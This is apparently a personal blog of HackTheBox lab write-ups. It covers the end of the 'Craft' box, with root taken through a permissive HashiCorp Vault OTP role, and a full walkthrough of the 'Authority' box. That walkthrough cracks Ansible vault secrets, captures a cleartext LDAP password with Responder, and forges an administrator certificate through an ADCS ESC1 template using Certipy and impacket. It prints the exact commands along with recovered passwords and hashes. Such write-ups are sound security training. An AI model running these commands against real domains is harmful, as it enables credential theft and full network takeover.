After some digging, I found an article stating that the issue was because the user didn’t include a newline after the closing line of the key. I went back and raw copied the key from the github. I had two new lines at the end, when I pasted it like so, it worked flawlessly.

Enumerating the user they don’t have any low hanging permissions or rights to take advantage on. Interestingly, I’m on the craft.htb host and not db which I suspected was the hostname of the Docker host.

Privilege Escalation

Vault

I looked a bit further and found .vault-token file which contains this token f1783c8d-41c7-0b12-d1c1-cf2aa17ac6b9gilfoyle. I looked through the filesystem with find / -iname "*vault*" 2>/dev/null and found these files.

/home/gilfoyle/.vault-token
/var/log/vaultssh.log
/usr/local/bin/vault
/usr/local/bin/vault-ssh-helper
/usr/local/etc/vault-ssh-helper.hcl

I then ran looked through them manually and greped for key words in them but didn’t find anything interesting. I tried to ssh into the port 6022 as maybe that is the vault that is mentioned. The amount of SSH files suggested that but I still can’t authenticate there. There are ssh related files and that the whole box is about web requests I decided to run my directory and subdomain enumerations as I canceled them prematurely at the start of the box. I scanned for some time but nothing new came up.

I looked again through the infra.craft repo and found a folder named vault. as both vault and vault-ssh-helper are in the bin folder I should be able to execute them and see how they work. I can read and list secrets from a vault, the issue is that I don’t know the path to it. I tried to do vault list /ssh/roles/root_otp as I saw this path in secrets.sh - didn’t work and seemed far fetched. There is a way to use ssh to authenticate into a vault, maybe i can use that token I found before in it. This is the info from the help option:

# Info from the `help` option
SSH using the OTP mode (requires sshpass for full automation):
	$ vault ssh -mode=otp -role=my-role user@1.2.3.4

SSH using the CA mode:
	$ vault ssh -mode=ca -role=my-role user@1.2.3.4

SSH using CA mode with host key verification:
	$ vault ssh \
		-mode=ca \
		-role=my-role \
		-host-key-mount-point=host-signer \
		-host-key-hostnames=example.com \
	user@example.com

There are three way to authenticate “one time password” and two “certificate authority” modes. Looking at the token I found it looks more like an OTP authentication.

I reviewed the source code and found these parts interesting:

vault write ssh/roles/root_otp \
 key_type=otp \
 default_user=root \
 cidr_list=0.0.0.0/0

Token: f1783c8d-41c7-0b12-d1c1-cf2aa17ac6b9gilfoyle

storage "file" {
	path = "/vault/data"
}
ui = false
listener "tcp" {
	address = "0.0.0.0:8200"
	tls_cert_file = "/vault/pki/vault.craft.htb.crt"
	tls_key_file = "/vault/pki/vault.craft.htb.key"
	tls_min_version = "tls12"

The first command is the most important one - it creates a role root_otp which can request to get OTPs for root and those request can come from any IP. This represents a lazy admin setup and because of this can get a root access simply by requesting it. The token is an OTP that was used by the user, it showed me what it looks like. The last script shows that the vault is located at /vault/data and that it is listening on all interfaces with HTTPS on the 8200 port.

To get the root, I simply ran vault ssh -mode=otp -role=root_otp root@10.129.22.88.

Closing Thoughts

This box was challenging to me, one of the most confusing I worked on. I had little experience until now with working with APIs and creating injections is something I need to practice more. I liked that I challenged myself to write my first working exploit for this box and it helped me to learn and refresh my Python knowledge. Simulation of reading up on a git repo and a really hands on code review was a great learning experience. I never worked with HashiCorp Vault before so this was also interesting - a lot of pivoting as well.

For code review and injections I think is important to try to really concentrate, go down the rabbit hole and really try to understand the logic of the mechanism. Sounds trivial I know, but I feel I could save a lot of time by starting with such hard mindset from the beginning.

PS: I still didn’t figure out what was port 6022 used for, so like ¯\(ツ)/¯

Authority

EmilPawlak@protonmail.com (Emil Pawlak) — 02.04.2026

Enumeration

I didn’t get any credentials assumed breach style so I will start with an enumeration.

nmap

Let’s start with a simple nmap enumeration.
sudo nmap -sC -sV -O -Pn 10.129.20.218; sleep 5; sudo nmap -p- -Pn 10.129.20.218; sleep 5; sudo nmap -sU 10.129.20.218

nmap scan results

Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-01 19:17 CEST
Nmap scan report for authority.htb.corp (10.129.20.218)
Host is up (0.029s latency).
Not shown: 986 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods: 
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-04-01 21:17:09Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: othername: UPN:AUTHORITY$@htb.corp, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after: 2024-08-09T23:13:21
|_ssl-date: 2026-04-01T21:18:10+00:00; +4h00m00s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-04-01T21:18:10+00:00; +4h00m00s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: othername: UPN:AUTHORITY$@htb.corp, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after: 2024-08-09T23:13:21
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: othername: UPN:AUTHORITY$@htb.corp, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after: 2024-08-09T23:13:21
|_ssl-date: 2026-04-01T21:18:10+00:00; +4h00m00s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-04-01T21:18:10+00:00; +4h00m00s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: othername: UPN:AUTHORITY$@htb.corp, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after: 2024-08-09T23:13:21
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
8443/tcp open ssl/http Apache Tomcat (language: en)
|_http-title: Site doesn't have a title (text/html;charset=ISO-8859-1).
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=172.16.2.118
| Not valid before: 2026-03-30T14:07:45
|_Not valid after: 2028-04-01T01:46:09
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.95%E=4%D=4/1%OT=53%CT=1%CU=42908%PV=Y%DS=2%DC=I%G=Y%TM=69CD5352
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=103%TI=I%CI=I%II=I%SS=S%TS=U
OS:)SEQ(SP=107%GCD=1%ISR=10C%TI=I%CI=I%II=I%SS=S%TS=U)SEQ(SP=108%GCD=1%ISR=
OS:108%TI=I%CI=I%II=I%SS=S%TS=U)SEQ(SP=FD%GCD=1%ISR=10E%TI=I%CI=I%II=I%SS=S
OS:%TS=U)SEQ(SP=FF%GCD=1%ISR=10C%TI=I%CI=I%II=I%SS=S%TS=U)OPS(O1=M4E2NW8NNS
OS:%O2=M4E2NW8NNS%O3=M4E2NW8%O4=M4E2NW8NNS%O5=M4E2NW8NNS%O6=M4E2NNS)WIN(W1=
OS:FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%DF=Y%T=80%W=FFFF%O=
OS:M4E2NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)
OS:T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S
OS:+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=N)U1(
OS:R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=80%CD=Z)

Network Distance: 2 hops
Service Info: Host: AUTHORITY; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 4h00m00s, deviation: 0s, median: 3h59m59s
| smb2-time: 
| date: 2026-04-01T21:18:05
|_ start_date: N/A
| smb2-security-mode: 
| 3:1:1: 
|_ Message signing enabled and required

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 69.14 seconds
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-01 19:18 CEST
Nmap scan report for authority.htb.corp (10.129.20.218)
Host is up (0.029s latency).
Not shown: 65506 closed tcp ports (reset)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
8443/tcp open https-alt
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49673/tcp open unknown
49690/tcp open unknown
49691/tcp open unknown
49693/tcp open unknown
49694/tcp open unknown
49703/tcp open unknown
49714/tcp open unknown
52328/tcp open unknown
59600/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 44.21 seconds

From this scan I can see a lot of Windows Domain related ports and a domain name so I will input that info into /etc/hosts with sudo vim /etc/hosts

SMB

Let’s start with SMB, I can see that I have access to two shares Development and IPC$ however after accessing the latter I wasn’t able to really look into it so let’s focus on the first one.

parrot@parrot (~): netexec smb 10.129.20.218 --shares -u guest -p ''
	Share Permissions Remark
	----- ----------- ------
	ADMIN$ Remote Admin
	C$ Default share
	Department Shares 
	Development READ 
	IPC$ READ Remote IPC
	NETLOGON Logon server share 
	SYSVOL Logon server share 

In Development I found Ansible holding four folders showing basic automation setup. Ansible is a general use, automation tool for admins. I looked through it manually and run some greps to look for passwords, creds, secrets and generally interesting data grep -R "pass". I found a lot of credentials of many kinds, even a bit of an overwhelming amount. To complete enumeration of possible users I also started a rid bruteforce to check known users on the host. netexec smb 10.129.20.218 -u guest -p '' --rid-brute

Users & groups

SMB 10.129.20.218 445 AUTHORITY 498: HTB\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.20.218 445 AUTHORITY 500: HTB\Administrator (SidTypeUser)
SMB 10.129.20.218 445 AUTHORITY 501: HTB\Guest (SidTypeUser)
SMB 10.129.20.218 445 AUTHORITY 502: HTB\krbtgt (SidTypeUser)
SMB 10.129.20.218 445 AUTHORITY 512: HTB\Domain Admins (SidTypeGroup)
SMB 10.129.20.218 445 AUTHORITY 513: HTB\Domain Users (SidTypeGroup)
SMB 10.129.20.218 445 AUTHORITY 514: HTB\Domain Guests (SidTypeGroup)
SMB 10.129.20.218 445 AUTHORITY 515: HTB\Domain Computers (SidTypeGroup)
SMB 10.129.20.218 445 AUTHORITY 516: HTB\Domain Controllers (SidTypeGroup)
SMB 10.129.20.218 445 AUTHORITY 517: HTB\Cert Publishers (SidTypeAlias)
SMB 10.129.20.218 445 AUTHORITY 518: HTB\Schema Admins (SidTypeGroup)
SMB 10.129.20.218 445 AUTHORITY 519: HTB\Enterprise Admins (SidTypeGroup)
SMB 10.129.20.218 445 AUTHORITY 520: HTB\Group Policy Creator Owners (SidTypeGroup)
SMB 10.129.20.218 445 AUTHORITY 521: HTB\Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.20.218 445 AUTHORITY 522: HTB\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.129.20.218 445 AUTHORITY 525: HTB\Protected Users (SidTypeGroup)
SMB 10.129.20.218 445 AUTHORITY 526: HTB\Key Admins (SidTypeGroup)
SMB 10.129.20.218 445 AUTHORITY 527: HTB\Enterprise Key Admins (SidTypeGroup)
SMB 10.129.20.218 445 AUTHORITY 553: HTB\RAS and IAS Servers (SidTypeAlias)
SMB 10.129.20.218 445 AUTHORITY 571: HTB\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.129.20.218 445 AUTHORITY 572: HTB\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.129.20.218 445 AUTHORITY 1000: HTB\AUTHORITY$ (SidTypeUser)
SMB 10.129.20.218 445 AUTHORITY 1101: HTB\DnsAdmins (SidTypeAlias)
SMB 10.129.20.218 445 AUTHORITY 1102: HTB\DnsUpdateProxy (SidTypeGroup)
SMB 10.129.20.218 445 AUTHORITY 1601: HTB\svc_ldap (SidTypeUser)

A bit surprising, there are no real users, maybe besides svc_ldap.

DNS

After that, I went and looked into DNS to learn more about the domain itself. I didn’t find much interesting information but I did notice that the name server was marked as authority.authority.htb which is a weird naming convention, nonetheless I added it to the /etc/hosts.

dig @authority.htb.comp 10.129.20.218 NS
<SNIP>
;; ANSWER SECTION:
authority.htb.		3600	IN	NS	authority.authority.htb.

HTTP port leads only to the default IIS website. I didn’t enumerate directories or subdomains, however it could be a good option if I wouldn’t find other promising vectors to pivot.

In Tomcat, I was greeted with this notice

PWM is currently in configuration mode. This mode allows updating the configuration without authenticating to an LDAP directory first. End user functionality is not available in this mode.

After you have verified the LDAP directory settings, use the Configuration Manager to restrict the configuration to prevent unauthorized changes. After restricting, the configuration can still be changed but will require LDAP directory authentication first.

PWM is a pretty popular authentication tool for Tomcat. It’s clearly is not setup correctly and it doesn’t allow me to use LDAP to authenticate. Due to it being in the configuration mode, there are other ways to authenticate.

Within them, I see another user, and another IP.

CN=svc_pwm,CN=Users,DC=htb,DC=corp (default) 	March 26, 2023 at 1:20:39 PM GMT 	10.129.204.183
n/a 	April 23, 2023 at 10:06:34 PM GMT 	

I can’t sign-in to the tomcat itself because and I get prompted with this information.

Directory unavailable. If this error occurs repeatedly please contact your help desk. 
5017 ERROR_DIRECTORY_UNAVAILABLE (all ldap profiles are unreachable; errors: ["error connecting as proxy user: unable to create connection: unable to connect to any configured ldap url, last error: unable to bind to ldaps://authority.authority.htb:636 as CN=svc_ldap,OU=Service Accounts,OU=CORP,DC=authority,DC=htb reason: CommunicationException (authority.authority.htb:636; PKIX path building failed: sun.security.provider.certpath.SunCertPathBuilderException: unable to find valid certification path to requested target)"])

I also can’t sign-in to the configuration page - I get the following error.

Password incorrect. Please try again.&lt;span class="errorDetail"&gt; { 5089 ERROR_PASSWORD_ONLY_BAD }&lt;/span&gt;<span class="errorDetail"> { 5089 ERROR_PASSWORD_ONLY_BAD }</span> { 5089 ERROR_PASSWORD_ONLY_BAD } 5089 ERROR_PASSWORD_ONLY_BAD

After trying multiple combinations of credentials I went back into the Ansible files which I downloaded locally with prompt OFF, recurse ON and mget * within the smbclient. In the PWM folder I found these hashes which turned out to be encrypted ansible blobs.

Ansible blobs

pwm_admin_login: !vault |
 $ANSIBLE_VAULT;1.1;AES256
 32666534386435366537653136663731633138616264323230383566333966346662313161326239
 6134353663663462373265633832356663356239383039640a346431373431666433343434366139
 35653634376333666234613466396534343030656165396464323564373334616262613439343033
 6334326263326364380a653034313733326639323433626130343834663538326439636232306531
 3438

pwm_admin_password: !vault |
 $ANSIBLE_VAULT;1.1;AES256
 31356338343963323063373435363261323563393235633365356134616261666433393263373736
 3335616263326464633832376261306131303337653964350a363663623132353136346631396662
 38656432323830393339336231373637303535613636646561653637386634613862316638353530
 3930356637306461350a316466663037303037653761323565343338653934646533663365363035
 6531

ldap_uri: ldap://127.0.0.1/
ldap_base_dn: "DC=authority,DC=htb"
ldap_admin_password: !vault |
 $ANSIBLE_VAULT;1.1;AES256
 63303831303534303266356462373731393561313363313038376166336536666232626461653630
 3437333035366235613437373733316635313530326639330a643034623530623439616136363563
 34646237336164356438383034623462323531316333623135383134656263663266653938333334
 3238343230333633350a646664396565633037333431626163306531336336326665316430613566
 3764

It turns out, it’s possible to crack them up with ansible2john, however it took some editing. This video helped me to make sure my syntax worked with hashcat. I then users hashcat -m 16900 to crack them and I got !@#$%^&*. I wasn’t able to find the one specific vault, I only found the file the hashes were in using grep -R "$ANSIBLE_VAULT;1.1;AES256" (each ansible vault does start with this specific string). After that I just went over each hash file and decrypt it with ansible-vault view ansible1.hash --vault-password-file ansible-vault.pass. A note to take for sure is that Ansible is pretty picky with its syntax.
After the decryption we got the following information.

pwm_admin_login: svc_pwm
pwm_admin_password: pWm_@dm!N_!23
ldap_admin_password: DevT3st@123

Foothold

svc_pwm

With them, I wasn’t able to auth into LDAP of course, but I could enter the PWN login.

After I looked through the dashboard I noticed I was able to download a copy of the local database called PWM-LocalDB.bak. From the configuration files and my instinct I think the point of the authority.authority.htb is just to make tomcat misconfigured and simply changing it to authority.htb would fix the issue. If there will not be any interesting data in the database itself, there is also a way to upload a database. We know that the file would go into c:\pwm\LocalDB which could be used for a webshell if the file verification is weak.

The process to extract data from the MSSQL backup binary on Linux would be quite hard, I will leave it for the time being and try that webshell idea first. As this runs Tomcat which uses Java I should look into Java JSP or maybe lastly ASP shells.

I tried to install a rev_shell with the .jsp extension, PWN does require it to be a GZIP format. I tried double extensions, changing the extension in BurpSuite as well as adjusting the content-type however I wasn’t able to upload it.

I moved around and found that there are another import/upload options for the configuration file itself. I downloaded the configuration file and looked through it. Below are some very interesting finds.

Configuration file finds

<property key="configPasswordHash">
$2a$10$gC/eoR5DVUShlZV4huYlg.L2NtHHmwHIxF3Nfid7FfQLoh17Nbnua
</property>

<value>
CN=svc_ldap,OU=Service Accounts,OU=CORP,DC=authority,DC=htb
</value>

<value>
ENC-PW:2G7ASAs2W4Y/XTfVMSsRtxxneQpeWaKaQaNsaIToSKlyqC1dVT2VXcqc1h3SiYtMTYfsZfkLaNHbjGfbQldz5EW7BqPxGqzMz+bEfyPIvA8=
</value>

<setting key="pwm.securityKey" modifyTime="2022-08-11T01:46:23Z" syntax="PASSWORD" syntaxVersion="0">
<label>
Settings ⇨ Security ⇨ Application Security ⇨ Security Key
</label>
<value>
ENC-PW:7AJ39Hy6+a56Y3ppsO0J0KIXAFF7CBwO5IBODlXvH5gSmELLNpTgnWcbu5s/vU4JKue/Um6dkZm1RrcECBHk358zc045rDyFL2fDku2kusl79NE+Tww8gC8QQ0CX+VS2yyD46+ZS6Jriyu1Y7BOXnJifXXXsHzTmBTkodvnY33V6Puc0Zze0PGYHN+CGFtx/g5WaBTQbQwZwNLA+8Qe11GqCz+rBjGzQp0w6yLHJn+ZYBlLWgvZwN2KUHOiUIq5eKKDgjv+mga4zcB1STcpMJRaIiSnLdY3VCfsEj6p4BGz9jj+N7gQHBFAvI05JexXq8HyL7ZUEzLXU5FMQXvhhWSbhxoz7LH/iamvoOg13WnI3MRUzrXv91Uh7gdNZuXa1NmSBOe/g1GgmFV+0sxLIJ/99VT+GHIwrfjPNNV6jtKHhURPwp0a38c6aBGjpvB3AgAoZ0/KVLvQK1pAevO4NK2XFF2nPD8gQCQJMCsb62I+XMitkO2zKytrYEwZhl9VUGF0bAXQhC5I9xX1tEQAGBcENt1NGfM8iE+PlrZWwlr1yDjw+GZEm2KHyjnUFpBubqD7l7mvEJbEV26SQkR0v4R5LSEPbElOKGbGXMKkDEi53SQ5P0ZZQbega9XtBOHs+/s1EZ4p/qGVCvpD9dgc0SyS0auXU0PUddjxyXthHdqRbEWHhAduXYQgXF0eM2yWlbd7fTgSUMERlpjdFX/QZG3D6Ghp+iOCwfelEfKMQDO1myQcpq5YTE94YDz+aSWvi7ZGRIq+hRkwuR8E0EbEUE7CApDwF3LjGi+UEd9Y3Q9SPSMVxg4Ra2FB4sYCT19N7KV3TpGvJYD4SE8Mrn0cH9ihvlvDJFOxoLC9xM8FA9EAvSZN1w6lV4pUsVpUSM0LRKLqCmBCRJvaRNbhRymM96NFSSi4PwCCJQ7WVJjiS+oLQ+7qwHhqLQFy0+gtkGSQnBoq1FMYSCyGz/fUG84Xe0CSTPt4SwTq+L2M2jqsiB+HXq1z2LdkAFo6xm1Mqs6H/x5ZP1esjvRxDzHod31jRizu+rJw4LNRb172A36dQWmiq/OJQBJrnPu87s+KmoNyCJGrT2+1QttMgM62qy2/Eb6xByQ8RiLl6v87vf24TuWhxJhXfNWMRuHXJp2IWt5BWAYdiQNUjCuvRhfiyxsIqelpEpsOnm8WDVEsN0hqaEt9Db2e/d3Wpx1as4luVtA/MZtKy+gsH0qZUmouj7LCfN5TJpm00MiBTxYSkapKvAGchkE4UVc3AHGIxeyy+t2LwqT9fDSlS/VofOELNcQD3OfPi+asOrgaqcRbZVXdQumoJsubLMiPpHTZtOH2Nt13cEh9ZG/XebrAkchsMjsyLo5KX0nL6RKbMNUA3BmM2cd+bjj+Jar2aeAeqBdW+LU5ALshAsF986N1BGSsQ8aZkJwLi3PUYG8vGR88ZqEMMziQ=
</value>
</setting>

Given that the found user is svc_ldap I think this is the path I should follow further. We got an encrypted hash of a password as well as a security key of some kind, let’s read up on them. So form I have gathered: This is a bcrypt password hash $2a$10$gC/eoR5DVUShlZV4huYlg.L2NtHHmwHIxF3Nfid7FfQLoh17Nbnua

This is a PWM master key

7AJ39Hy6+a56Y3ppsO0J0KIXAFF7CBwO5IBODlXvH5gSmELLNpTgnWcbu5s/vU4JKue/Um6dkZm1RrcECBHk358zc045rDyFL2fDku2kusl79NE+Tww8gC8QQ0CX+VS2yyD46+ZS6Jriyu1Y7BOXnJifXXXsHzTmBTkodvnY33V6Puc0Zze0PGYHN+CGFtx/g5WaBTQbQwZwNLA+8Qe11GqCz+rBjGzQp0w6yLHJn+ZYBlLWgvZwN2KUHOiUIq5eKKDgjv+mga4zcB1STcpMJRaIiSnLdY3VCfsEj6p4BGz9jj+N7gQHBFAvI05JexXq8HyL7ZUEzLXU5FMQXvhhWSbhxoz7LH/iamvoOg13WnI3MRUzrXv91Uh7gdNZuXa1NmSBOe/g1GgmFV+0sxLIJ/99VT+GHIwrfjPNNV6jtKHhURPwp0a38c6aBGjpvB3AgAoZ0/KVLvQK1pAevO4NK2XFF2nPD8gQCQJMCsb62I+XMitkO2zKytrYEwZhl9VUGF0bAXQhC5I9xX1tEQAGBcENt1NGfM8iE+PlrZWwlr1yDjw+GZEm2KHyjnUFpBubqD7l7mvEJbEV26SQkR0v4R5LSEPbElOKGbGXMKkDEi53SQ5P0ZZQbega9XtBOHs+/s1EZ4p/qGVCvpD9dgc0SyS0auXU0PUddjxyXthHdqRbEWHhAduXYQgXF0eM2yWlbd7fTgSUMERlpjdFX/QZG3D6Ghp+iOCwfelEfKMQDO1myQcpq5YTE94YDz+aSWvi7ZGRIq+hRkwuR8E0EbEUE7CApDwF3LjGi+UEd9Y3Q9SPSMVxg4Ra2FB4sYCT19N7KV3TpGvJYD4SE8Mrn0cH9ihvlvDJFOxoLC9xM8FA9EAvSZN1w6lV4pUsVpUSM0LRKLqCmBCRJvaRNbhRymM96NFSSi4PwCCJQ7WVJjiS+oLQ+7qwHhqLQFy0+gtkGSQnBoq1FMYSCyGz/fUG84Xe0CSTPt4SwTq+L2M2jqsiB+HXq1z2LdkAFo6xm1Mqs6H/x5ZP1esjvRxDzHod31jRizu+rJw4LNRb172A36dQWmiq/OJQBJrnPu87s+KmoNyCJGrT2+1QttMgM62qy2/Eb6xByQ8RiLl6v87vf24TuWhxJhXfNWMRuHXJp2IWt5BWAYdiQNUjCuvRhfiyxsIqelpEpsOnm8WDVEsN0hqaEt9Db2e/d3Wpx1as4luVtA/MZtKy+gsH0qZUmouj7LCfN5TJpm00MiBTxYSkapKvAGchkE4UVc3AHGIxeyy+t2LwqT9fDSlS/VofOELNcQD3OfPi+asOrgaqcRbZVXdQumoJsubLMiPpHTZtOH2Nt13cEh9ZG/XebrAkchsMjsyLo5KX0nL6RKbMNUA3BmM2cd+bjj+Jar2aeAeqBdW+LU5ALshAsF986N1BGSsQ8aZkJwLi3PUYG8vGR88ZqEMMziQ=

This is a PWM encrypted password 2G7ASAs2W4Y/XTfVMSsRtxxneQpeWaKaQaNsaIToSKlyqC1dVT2VXcqc1h3SiYtMTYfsZfkLaNHbjGfbQldz5EW7BqPxGqzMz+bEfyPIvA8=

I don’t know how to decrypt the PWM’s blob with the master key, so I will go first with the bcrypt. I added it into a file and ran hashcat -m 3200 pwm.bcrypt /usr/share/wordlists/rockyou.txt When I started to decrypt it it showed me it will over a day (bcrypt is designed to be hard to crack). In turn, I will use a much smaller wordlists and look for other ways to pivot.

There are ways to decrypt the encrypted blob but I don’t want to run unsure git tools and GPT’s recommendations are similarly uncertain.

svc_ldap

Looking for other options I just realized that configuration “Manager” and “Editor” are not the same thing. There is a lot of data and settings in the editor that seem like interesting vectors.

In the configuration file I downloaded from the manager I tried to derive the password and found out that svc_ldap is the proxy username. I can see the same information in the editor however I can change it there. I can see, that LDAP is running in LDAPS. I wonder If i change it will i break the box or will I be able to pull some unencrypted data from the configuration.xml this time.

I changed ldaps://authority.authority.htb:636 to ldap://authority.authority.htb:389, saved the changes, went into the manager and collected the configuration file but it didn’t change it then. As the editor allows us to change the LDAP URL as well as the protocol itself. I decided to try and spit up Responder with sudo responder -I tun0 and after I edited the details and saved the changes I clicked “Test LDAP Profile”.

This caused the website to authenticate to my server and because I changed it from LDAPS to LDAP password came in clear text.

[LDAP] Cleartext Client : 10.129.20.218
[LDAP] Cleartext Username : CN=svc_ldap,OU=Service Accounts,OU=CORP,DC=authority,DC=htb
[LDAP] Cleartext Password : lDaP_1n_th3_cle4r!

Then, I checked if I can authenticate to anything with the new credentials using netexec.
netexec smb 10.129.20.218 -u 'svc_ldap' -p 'lDaP_1n_th3_cle4r!'
netexec winrm 10.129.20.218 -u 'svc_ldap' -p 'lDaP_1n_th3_cle4r!'

Privilege Escalation

Administrator

Seeing that I can access WinRM I used evil-winrm to do so. evil-winrm -i authority.htb -u 'svc_ldap' -p 'lDaP_1n_th3_cle4r!'

I did some manual enumeration for possible priv-esc vectors but I wasn’t able to find anything of use. I looked through the PWM files, SMB shares and user’s files. I downloaded PWM and its config locally, hoping to decrypt the blob with my master key, but couldn’t do it without setting up the full software.

Certipy

I thought of running WinPEAS, BloodHound and Certipy so I started with the latter. certipy find -u svc_ldap@authority.htb -p 'lDaP_1n_th3_cle4r!' -vulnerable -target 10.129.20.218 -dc-ip 10.129.20.218 -stdout

The output showed me that there is an ESC1 vulnerable template called CorpVPN. ESC1 is the first of a number of escalation attacks to ADCS. This one simply enabled you to pretend to be someone else. You request a certificate and choose the identity inside of it like Admin. The CA trusts you and signs it, so you get a valid login as that user. Requirements for it to work:

Enrollee Supplies Subject = True
Client Authentication = True (or a few others)
“User Enrollable Principals” showing a group your user is a part of
Requires Manager Approval = False
Authorized Signatures Required = 0

I tried to run it with the existing user like this certipy req -u 'svc_ldap@authority.htb' -p 'lDaP_1n_th3_cle4r!' -dc-ip '10.129.20.218' -target 'AUTHORITY-CA' -ca 'authority.authority.htb' -template 'CorpVPN' -upn 'administrator@authority.htb' -sid 'S-1-5-21-622327497-3269355298-2248959698-500' but I just later noticed that the user is not a part of any group the template is assigned for.

The only group that is not highly-privileged and can use this template is Domain Computers. Often domain users are able to create a given number of computer hosts which is dictated by a quota parameter - you can quickly check it with netexec.

parrot@parrot (~/Desktop): netexec ldap 10.129.20.218 -u 'svc_ldap' -p 'lDaP_1n_th3_cle4r!' -M maq
LDAP 10.129.20.218 389 AUTHORITY [*] Windows 10 / Server 2019 Build 17763 (name:AUTHORITY) (domain:authority.htb) (signing:Enforced) (channel binding:Never) 
LDAP 10.129.20.218 389 AUTHORITY [+] authority.htb\svc_ldap:lDaP_1n_th3_cle4r! 
MAQ 10.129.20.218 389 AUTHORITY [*] Getting the MachineAccountQuota
MAQ 10.129.20.218 389 AUTHORITY MachineAccountQuota: 10

Note: this method works only if you use ldap with netexec.

addcomputer.py

This shows us that svc_ldap can add 10 machines total - let’s add one with impacket. addcomputer.py authority.htb/svc_ldap:lDaP_1n_th3_cle4r! -dc-ip 10.129.20.218 -computer-name azaeir$ -computer-pass azaeir.

Let’s check if it was added correctly on the host with Get-ADObject -Filter 'Name -eq "azaeir"' -Properties *.

Assuming, computer account is in Domain Computers group by default we can now run the edited certipy request. Weirdly enough I had a lot of trouble getting the .pfx file still. After a lot of troubleshooting it turns out that i had to specify -method LDAPS in my addcomputer.py command for it to work like so:

addcomputer.py authority.htb/svc_ldap:lDaP_1n_th3_cle4r! -method LDAPS -dc-ip 10.129.20.218 -computer-name azaeir1$ -computer-pass azaeir

I assume this could be because normal computer account creation uses SAMR and when I specify LDAPs if provides proper attributes and trust behavior is set correctly for certipy - just a theory. Both methods added the account to the Domain Computers group.

Anyway, now I could generate that administrator file. certipy req -username 'azaeir1$' -password azaeir -ca AUTHORITY-CA -dc-ip 10.129.20.218 -template CorpVPN -upn administrator@authority.htb -dns authority.htb -debug

This command also works certipy req -u 'azaeir1$@authority.htb' -p 'azaeir' -dc-ip '10.129.20.218' -ca 'AUTHORITY-CA' -template 'CorpVPN' -upn 'administrator@authority.htb' -target authority.authority.htb -target-ip 10.129.20.218

I adjusted my time using sudo ntpdate authority.htb and ran certipy auth -pfx administrator.pfx -dc-ip 10.129.20.218 to get the TGT as well as NTLM hash.

TGT: administrator.ccache
NTLM: aad3b435b51404eeaad3b435b51404ee:6961f422924da90a6928197429eea4ed

As both Kerberos and NTLM are allowed on the host we have two ways to authenticate. With NTLM we get the NT hash and run evil-winrm -i authority.htb -u administrator -H 6961f422924da90a6928197429eea4ed

With Kerberos:

Check if you don’t have any unexpected tickets assigned with klist
Change the kerberos cache you’re using with export KRB5CCNAME=administrator.ccache and double-check if it worked with echo $KRB5CCNAME and klist
